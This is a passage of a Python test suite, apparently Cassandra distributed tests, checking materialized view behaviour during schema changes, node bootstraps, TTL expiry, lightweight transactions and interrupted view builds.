                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    assert len(result) == 2, "Expecting {} materialized view, got {}".format(2, len(result))

    # Dropping one view must leave the other in the schema tables.
    session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")

    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
def test_drop_column(self):
    """Test that we cannot drop a column if it is used by a MV"""
    session = self.prepare(user_table=True)

    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))

    # 'state' is part of the view's primary key, so the drop must be rejected.
    assert_invalid(
        session,
        "ALTER TABLE ks.users DROP state;",
        "Cannot drop column state on base table with materialized views."
    )
def test_drop_table(self):
    """Test that we cannot drop a table without deleting its MVs first"""
    session = self.prepare(user_table=True)

    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))

    # Dropping the base table while the view still exists must be rejected.
    assert_invalid(
        session,
        "DROP TABLE ks.users;",
        "Cannot drop table when materialized views still depend on it"
    )

    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))

    # After dropping the view first, the table drop succeeds and no view remains.
    session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
    session.execute("DROP TABLE ks.users;")

    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    # Final message previously said "Expecting 1" while asserting 0.
    assert len(result) == 0, "Expecting {} materialized view, got {}".format(0, len(result))
def test_clustering_column(self):
    """Test that we can use clustering columns as primary key for a materialized view"""
    session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)

    session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
                     "session_token varchar, state varchar, birth_year bigint, "
                     "PRIMARY KEY (username, state, birth_year));"))

    # create a materialized view that use a compound key
    session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
                     "AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
                     "AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))

    session.cluster.control_connection.wait_for_schema_agreement()

    self._insert_data(session)

    result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
    assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))

    # Both clustering columns of the view can be restricted.
    result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
    assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
def _add_dc_after_mv_test(self, rf, nts):
    """
    @jira_ticket CASSANDRA-10978
    Add datacenter with configurable replication.

    Writes through a view, bootstraps two nodes into a new dc2, optionally
    switches keyspaces to NetworkTopologyStrategy and rebuilds, then verifies
    the view both from the new dc and for fresh writes.
    """
    session = self.prepare(rf=rf)

    logger.debug("Creating schema")
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Writing 1k to base")
    for i in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    logger.debug("Reading 1k from view")
    for i in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])

    logger.debug("Reading 1k from base")
    for i in range(1000):
        assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])

    logger.debug("Bootstrapping new node in another dc")
    node4 = new_node(self.cluster, data_center='dc2')
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    logger.debug("Bootstrapping new node in another dc")
    node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
    node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)], wait_for_binary_proto=True)
    if nts:
        # Switch to NetworkTopologyStrategy so dc2 owns replicas, then stream
        # existing data into the new nodes from dc1.
        session.execute("alter keyspace ks with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
        session.execute("alter keyspace system_auth with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
        session.execute("alter keyspace system_traces with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
        node4.nodetool('rebuild dc1')
        node5.nodetool('rebuild dc1')

    cl = ConsistencyLevel.LOCAL_ONE if nts else ConsistencyLevel.ONE
    session2 = self.patient_exclusive_cql_connection(node4, consistency_level=cl)

    logger.debug("Verifying data from new node in view")
    for i in range(1000):
        assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])

    logger.debug("Inserting 100 into base")
    for i in range(1000, 1100):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    logger.debug("Verify 100 in view")
    for i in range(1000, 1100):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_dc_after_mv_simple_replication(self):
    """
    @jira_ticket CASSANDRA-10634
    Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
    """
    self._add_dc_after_mv_test(1, False)
@pytest.mark.resource_intensive
def test_add_dc_after_mv_network_replication(self):
    """
    @jira_ticket CASSANDRA-10634
    Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
    """
    self._add_dc_after_mv_test({'dc1': 1}, True)
@pytest.mark.resource_intensive
def test_add_node_after_mv(self):
    """
    @jira_ticket CASSANDRA-10978
    Test that materialized views work as expected when adding a node.
    """
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    for i in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
    for i in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])

    # Bootstrap a fourth node into the same dc.
    node4 = new_node(self.cluster, data_center="dc1")
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    session2 = self.patient_exclusive_cql_connection(node4)

    """
    @jira_ticket CASSANDRA-12984
    Assert that MVs are marked as build after bootstrap. Otherwise newly streamed MVs will be built again
    """
    assert_one(session2, "SELECT count(*) FROM system.built_views WHERE keyspace_name = 'ks' AND view_name = 't_by_v'", [1])

    for i in range(1000):
        assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])

    # Fresh writes after the bootstrap must also show up in the view.
    for i in range(1000, 1100):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
    for i in range(1000, 1100):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_insert_during_range_movement_rf1(self):
    """Inserts racing a node join, RF=1 (see _base_test_insert_during_range_movement)."""
    self._base_test_insert_during_range_movement(rf=1)

def test_insert_during_range_movement_rf2(self):
    """Inserts racing a node join, RF=2."""
    self._base_test_insert_during_range_movement(rf=2)

def test_insert_during_range_movement_rf3(self):
    """Inserts racing a node join, RF=3."""
    self._base_test_insert_during_range_movement(rf=3)
def _base_test_insert_during_range_movement(self, rf):
    """
    @jira_ticket CASSANDRA-14251
    Test that materialized views replication work in the middle of a join
    for different replication factors.
    """
    session = self.prepare(rf=rf)

    logger.debug("Creating table and view")
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    # Write-survey mode keeps node4 in a joining state until we tell it to join.
    logger.debug("Starting new node4 in write survey mode")
    node4 = new_node(self.cluster, data_center="dc1")
    # Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true",
                                                      "-Dcassandra.batchlog.replay_timeout_in_ms=1"])

    logger.debug("Insert data while node4 is joining")
    for i in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    logger.debug("Finish joining node4")
    node4.nodetool("join")

    logger.debug('Replay batchlogs')
    time.sleep(0.001)  # Wait batchlog.replay_timeout_in_ms=1 (ms)
    self._replay_batchlogs()

    logger.debug("Verify data")
    for i in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_node_after_wide_mv_with_range_deletions(self):
    """
    @jira_ticket CASSANDRA-11670
    Test that materialized views work with wide partitions and range
    tombstones as expected when adding a node.
    """
    session = self.prepare()

    # Compaction is disabled so the flushed sstables (and the range
    # tombstones inside them) survive untouched until streaming.
    session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v)) WITH compaction = { 'class': 'SizeTieredCompactionStrategy', 'enabled': 'false' }")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    # Write 100 clustering rows under each of 10 partitions and flush.
    for pk in range(10):
        for ck in range(100):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=pk, v=ck))
    self.cluster.flush()

    for pk in range(10):
        for ck in range(100):
            assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(pk, ck), [pk, ck])
            assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])

    # Range-delete [ck, ck + 2) at every multiple of 10, then flush.
    for pk in range(10):
        for ck in range(100):
            if ck % 10 == 0:
                session.execute("DELETE FROM t WHERE id = {} AND v >= {} and v < {}".format(pk, ck, ck + 2))
    self.cluster.flush()

    # Each deletion removed ck and ck + 1; everything else must survive.
    for pk in range(10):
        for ck in range(100):
            if ck % 10 == 0 or (ck - 1) % 10 == 0:
                assert_none(session, "SELECT * FROM t WHERE id = {} and v = {}".format(pk, ck))
                assert_none(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(pk, ck))
            else:
                assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(pk, ck), [pk, ck])
                assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])

    # Bootstrap a new node, constrained to small mutations (CASSANDRA-11670).
    node4 = new_node(self.cluster, data_center="dc1")
    node4.set_configuration_options(values={'max_mutation_size_in_kb': 20})  # CASSANDRA-11670
    logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    session2 = self.patient_exclusive_cql_connection(node4)

    # The data streamed to the new node must reflect the range deletions.
    for pk in range(10):
        for ck in range(100):
            if ck % 10 == 0 or (ck - 1) % 10 == 0:
                assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(pk, ck))
                assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(pk, ck))
            else:
                assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(pk, ck), [pk, ck])
                assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])

    # Post-bootstrap writes must be visible on the new node as well.
    for pk in range(10):
        for ck in range(100, 110):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=pk, v=ck))

    for pk in range(10):
        for ck in range(110):
            if ck < 100 and (ck % 10 == 0 or (ck - 1) % 10 == 0):
                assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(pk, ck))
                assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(pk, ck))
            else:
                assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(pk, ck), [pk, ck])
                assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])
@pytest.mark.resource_intensive
def test_add_node_after_very_wide_mv(self):
    """
    @jira_ticket CASSANDRA-11670
    Test that materialized views work with very wide materialized views as
    expected when adding a node.
    """
    session = self.prepare()

    session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    # 5 partitions x 5000 clustering rows makes for very wide view partitions.
    for pk in range(5):
        for ck in range(5000):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=pk, v=ck))
    self.cluster.flush()

    for pk in range(5):
        for ck in range(5000):
            assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])

    # Bootstrap a new node, constrained to small mutations (CASSANDRA-11670).
    node4 = new_node(self.cluster, data_center="dc1")
    node4.set_configuration_options(values={'max_mutation_size_in_kb': 20})  # CASSANDRA-11670
    logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    session2 = self.patient_exclusive_cql_connection(node4)
    for pk in range(5):
        for ck in range(5000):
            assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])

    # Rewrite every row plus 100 new ones after bootstrap, then verify all.
    for pk in range(5):
        for ck in range(5100):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=pk, v=ck))

    for pk in range(5):
        for ck in range(5100):
            assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])
@pytest.mark.resource_intensive
def test_add_write_survey_node_after_mv(self):
    """
    @jira_ticket CASSANDRA-10621
    @jira_ticket CASSANDRA-10978
    Test that materialized views work as expected when adding a node in
    write survey mode.
    """
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    for key in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=key, v=-key))
    for key in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-key), [-key, key])

    # Start a node in write-survey mode: it receives writes but does not
    # serve reads or formally join the ring.
    node4 = new_node(self.cluster, data_center="dc1")
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    for key in range(1000, 1100):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=key, v=-key))

    # Every row written before and during the survey must be in the view.
    for key in range(1100):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-key), [-key, key])
def test_allow_filtering(self):
    """Test that ALLOW FILTERING works as usual for a materialized view."""
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
                     "WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))

    for key in range(1000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=key))

    for key in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=key), [key, key, 'a', 3.0])

    rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
    assert len(rows) == 1000, "Expected 1000 rows but got {}".format(len(rows))

    # Filtering on a non-PK view column without ALLOW FILTERING is rejected.
    assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
    assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")

    # With ALLOW FILTERING the same predicates are accepted.
    for key in range(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(key),
            [key, key, 'a', 3.0]
        )
        assert_one(
            session,
            "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(key),
            ['a', key, key, 3.0]
        )
def test_secondary_index(self):
    """Verify that creating a secondary index on a materialized view fails."""
    session = self.prepare()
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    # Index creation on a view must be rejected with an explicit message.
    assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
                   "Secondary indexes are not supported on materialized views")
def test_ttl(self):
    """
    Test that TTL works as expected for a materialized view
    @expected_result The TTL is propagated properly between tables.
    """
    session = self.prepare()
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
                     "WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))

    # Insert 100 rows that all expire after 10 seconds.
    for key in range(100):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=key))
    for key in range(100):
        assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(key), [key, key, key, key])

    # After the TTL has elapsed the view must be empty as well.
    time.sleep(20)
    rows = list(session.execute("SELECT * FROM t_by_v2"))
    assert len(rows) == 0, "Expected 0 rows but got {}".format(len(rows))
def test_query_all_new_column(self):
    """
    Test that a materialized view created with a 'SELECT *' works as
    expected when adding a new column
    @expected_result The new column is present in the view.
    """
    session = self.prepare(user_table=True)
    self._insert_data(session)

    assert_one(
        session,
        "SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
    )

    session.execute("ALTER TABLE users ADD first_name varchar;")

    results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
    assert len(results) == 1
    assert hasattr(results[0], 'first_name'), 'Column "first_name" not found'
    # A 'SELECT *' view picks up the new base column (with a null value).
    assert_one(
        session,
        "SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
    )
def test_query_new_column(self):
    """
    Test that a materialized view created with 'SELECT <col1, ...>' works
    as expected when adding a new column
    @expected_result The new column is not present in the view.
    """
    session = self.prepare(user_table=True)
    session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT state, username FROM users "
                     "WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
    self._insert_data(session)

    assert_one(
        session,
        "SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1']
    )

    session.execute("ALTER TABLE users ADD first_name varchar;")

    results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
    assert len(results) == 1
    # The view selects explicit columns only, so it must not pick up the
    # newly added base column.
    assert not hasattr(results[0], 'first_name'), 'Column "first_name" found in view'
    assert_one(
        session,
        "SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1']
    )
def test_rename_column(self):
    """
    Test that a materialized view created with a 'SELECT *' works as
    expected when renaming a column
    @expected_result The column is also renamed in the view.
    """
    session = self.prepare(user_table=True)
    self._insert_data(session)

    assert_one(
        session,
        "SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
    )

    session.execute("ALTER TABLE users RENAME username TO user")

    # The renamed column must be queryable in the view under its new name.
    results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND user = 'user1'"))
    assert len(results) == 1
    assert hasattr(results[0], 'user'), 'Column "user" not found'
    assert_one(
        session,
        "SELECT state, user, birth_year, gender FROM users_by_state WHERE state = 'TX' AND user = 'user1'",
        ['TX', 'user1', 1968, 'f']
    )
def test_rename_column_atomicity(self):
    """
    Test that column renaming is done atomically between a table and its
    materialized views
    @jira_ticket CASSANDRA-12952
    """
    session = self.prepare(nodes=1, user_table=True, install_byteman=True)
    node = self.cluster.nodelist()[0]
    self._insert_data(session)

    assert_one(
        session,
        "SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
    )

    # Rename a column with an injected byteman rule that kills the node
    # after the first schema update, interrupting the rename midway.
    self.fixture_dtest_setup.allow_log_errors = True
    script_version = '4x' if self.cluster.version() >= '4' else '3x'
    node.byteman_submit([mk_bman_path('merge_schema_failure_{}.btm'.format(script_version))])
    with pytest.raises(NoHostAvailable):
        session.execute("ALTER TABLE users RENAME username TO user")

    logger.debug('Restarting node')
    node.stop()
    node.start(wait_for_binary_proto=True)
    session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)

    # Both the table and its view should have the new schema after restart
    assert_one(
        session,
        "SELECT * FROM ks.users WHERE state = 'TX' AND user = 'user1' ALLOW FILTERING",
        ['user1', 1968, 'f', 'ch@ngem3a', None, 'TX']
    )
    assert_one(
        session,
        "SELECT * FROM ks.users_by_state WHERE state = 'TX' AND user = 'user1'",
        ['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
    )
def test_lwt(self):
    """
    Test that lightweight transactions behave properly with a materialized view.

    Inserts 1000 rows with IF NOT EXISTS, verifies that conditional
    re-inserts are no-ops, then conditionally updates and deletes the
    first 10 rows, checking the view after each phase.
    """
    session = self.prepare()
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Inserting initial data using IF NOT EXISTS")
    for i in range(1000):
        session.execute(
            "INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
        )
    self._replay_batchlogs()

    logger.debug("All rows should have been inserted")
    for i in range(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )

    # IF NOT EXISTS against existing rows must be a no-op.
    # (Fixed log message typo: "Tyring to UpInsert" -> "Trying to upsert".)
    logger.debug("Trying to upsert data with a different value using IF NOT EXISTS")
    for i in range(1000):
        v = i * 2
        session.execute(
            "INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
        )
    self._replay_batchlogs()

    logger.debug("No rows should have changed")
    for i in range(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )

    logger.debug("Update the 10 first rows with a different value")
    for i in range(1000):
        v = i + 2000
        # Only rows with v < 10 (the first 10) satisfy the condition.
        session.execute(
            "UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
        )
    self._replay_batchlogs()

    logger.debug("Verify that only the 10 first rows changed.")
    results = list(session.execute("SELECT * FROM t_by_v;"))
    assert len(results) == 1000
    for i in range(1000):
        v = i + 2000 if i < 10 else i
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(v),
            [v, i, 'a', 3.0]
        )

    logger.debug("Deleting the first 10 rows")
    for i in range(1000):
        v = i + 2000
        # Only the 10 rows updated above have v == i + 2000, so only they match.
        session.execute(
            "DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
        )
    self._replay_batchlogs()

    logger.debug("Verify that only the 10 first rows have been deleted.")
    results = list(session.execute("SELECT * FROM t_by_v;"))
    assert len(results) == 990
    for i in range(10, 1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )
def test_interrupt_build_process(self):
    """
    Test that an interrupted MV build process is resumed as it should.

    Byteman rules prevent the build from being finalized; the cluster is
    then stopped mid-build and restarted, and the build must resume
    (not restart) and eventually complete.
    """
    options = {'hinted_handoff_enabled': False}
    if self.cluster.version() >= '4':
        options['concurrent_materialized_view_builders'] = 4

    session = self.prepare(options=options, install_byteman=True)
    node1, node2, node3 = self.cluster.nodelist()

    logger.debug("Avoid premature MV build finalization with byteman")
    for node in self.cluster.nodelist():
        # In 4.0 the build is distributed over multiple tasks, so both the
        # per-task and the whole-build finalization must be skipped.
        if self.cluster.version() >= '4':
            node.byteman_submit([mk_bman_path('4.0/skip_view_build_finalization.btm')])
            node.byteman_submit([mk_bman_path('4.0/skip_view_build_task_finalization.btm')])
        else:
            node.byteman_submit([mk_bman_path('pre4.0/skip_finish_view_build_status.btm')])
            node.byteman_submit([mk_bman_path('pre4.0/skip_view_build_update_distributed.btm')])

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")

    logger.debug("Inserting initial data")
    for i in range(10000):
        session.execute(
            "INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
        )

    logger.debug("Create a MV")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
    self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)

    logger.debug("Stop the cluster. Interrupt the MV build process.")
    self.cluster.stop()

    logger.debug("Checking logs to verify that the view build tasks have been created")
    for node in self.cluster.nodelist():
        assert node.grep_log('Starting new view build', filename='debug.log')
        assert not node.grep_log('Resuming view build', filename='debug.log')
        node.mark_log(filename='debug.log')

    logger.debug("Restart the cluster")
    self.cluster.start()
    session = self.patient_cql_connection(node1)
    session.execute("USE ks")

    logger.debug("MV shouldn't be built yet.")
    # Bug fix: COUNT(*) returns exactly one result row, so
    # len(list(...)) was always 1 and the old `!= 10000` check was
    # vacuously true. Compare the counted value instead.
    assert list(session.execute("SELECT COUNT(*) FROM t_by_v"))[0][0] != 10000

    logger.debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
    self._wait_for_view("ks", "t_by_v")

    logger.debug("Verify all data")
    assert_one(session, "SELECT COUNT(*) FROM t_by_v", [10000])
    for i in range(10000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0],
            cl=ConsistencyLevel.ALL
        )

    logger.debug("Checking logs to verify that some view build tasks have been resumed")
    for node in self.cluster.nodelist():
        assert node.grep_log('Resuming view build', filename='debug.log')
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('4.0')
def test_drop_while_building(self):
    """Test that a parallel MV build is interrupted when the view is removed"""
    session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")

    logger.debug("Inserting initial data")
    for i in range(5000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))

    logger.debug("Slowing down MV build with byteman")
    for node in self.cluster.nodelist():
        node.byteman_submit([mk_bman_path('4.0/view_builder_task_sleep.btm')])

    logger.debug("Create a MV")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
    self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)

    logger.debug("Drop the MV while it is still building")
    session.execute("DROP MATERIALIZED VIEW t_by_v")

    logger.debug("Verify that the build has been stopped before its finalization without errors")
    for node in self.cluster.nodelist():
        self.check_logs_for_errors()
        assert not node.grep_log('Marking view', filename='debug.log')
        assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')

    logger.debug("Verify that the view has been removed")
    failed = False
    try:
        session.execute("SELECT COUNT(*) FROM t_by_v")
    except InvalidRequest:
        failed = True
    # Bug fix: these pytest-based dtests are not unittest.TestCase
    # subclasses, so self.assertTrue is not available; use a plain assert,
    # matching the identical check in test_drop_with_stopped_build.
    assert failed, "The view shouldn't be queryable"
    self._assert_view_meta(session, views=1, exists=False)

    logger.debug("Create the MV again")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
